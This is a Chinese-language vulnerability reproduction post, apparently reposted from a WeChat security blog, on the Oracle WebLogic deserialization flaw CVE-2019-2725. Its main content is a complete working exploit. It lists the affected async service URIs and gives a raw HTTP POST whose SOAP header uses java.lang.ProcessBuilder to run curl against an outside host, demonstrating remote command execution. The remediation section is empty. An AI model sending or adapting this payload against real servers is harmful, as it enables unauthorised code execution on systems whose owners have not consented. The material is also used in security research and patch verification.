Oracle WebLogic Server 是一个统一的可扩展平台,专用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。它提供了一种强健、成熟和可扩展的Java Enterprise Edition (EE) 和 Jakarta EE 实施方式。
漏洞参考:
漏洞编号:
复现环境:
Oracle WebLogic Server 10.3.6.0
0X02 漏洞复现
http://192.168.245.134:7001/_async/AsyncResponseService
默认受影响的uri:
/_async/AsyncResponseService
/_async/AsyncResponseServiceJms
/_async/AsyncResponseServiceHttps
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.245.134:7001
Upgrade-Insecure-Requests: 1
content-type: text/xml
Content-Length: 707
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="2">
<void index="0">
<string>curl</string>
</void>
<void index="1">
<string>http://192.168.245.129:9999/123</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
0X03 修复建议
0X04
原文始发于微信公众号(皓月的笔记本):【漏洞复现】Weblogic 反序列化漏洞(CVE-2019-2725)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论